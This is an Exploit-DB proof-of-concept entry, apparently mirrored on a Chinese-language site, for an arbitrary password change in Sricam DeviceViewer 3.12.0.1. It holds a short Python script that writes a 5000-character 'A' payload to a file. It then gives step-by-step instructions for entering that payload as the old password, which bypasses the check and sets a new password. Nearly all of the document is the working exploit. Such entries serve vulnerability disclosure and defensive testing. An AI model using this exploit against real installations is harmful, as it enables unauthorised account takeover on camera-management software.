DeviceViewer 3.12.0.1 – Arbitrary Password Change

  • 作者: Alessandro Magnosi
    日期: 2019-10-09
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/47476/
  • # Exploit Title: DeviceViewer 3.12.0.1 - Arbitrary Password Change
    # Date: 2019-09-10
    # Exploit Author: Alessandro Magnosi
    # Vendor Homepage: http://www.sricam.com/
    # Software Link: http://download.sricam.com/Manual/DeviceViewer.exe
    # Version: v3.12.0.1
    # Tested on: Windows 7
    
    #!/usr/bin/python
    
    # Steps to reproduce:
    # 1. Generate the payload executing the PoC
    # 2. Login in the Sricam DeviceViewer application as any registered user
    # 3. Go to System Tools -> Change Password
    # 4. Set the old password as the malicious payload, and the new password as whatever you want
    # 5. The password will be changed with the new one
    # 6. To confirm, restart the application and try to login with the new password
    
    payload = "A" * 5000
    
    try:
    	bypass = open("bypass.txt","w")
    	print("### Sricam DeviceViewer 3.12.0.1 Change Password Security Bypass")
    	print("### Author: Alessandro Magnosi\n")
    	print("[*] Creating old password file")
    	bypass.write(payload)
    	bypass.close()
    	print("[+] Old password file created\n")
    	print("[i] When changing password, set the old password to the file contents")
    	print("[i] Close the program and reopen it")
    	print("[i] Log in with new password")
    except:
    	print("[!] Error creating the file")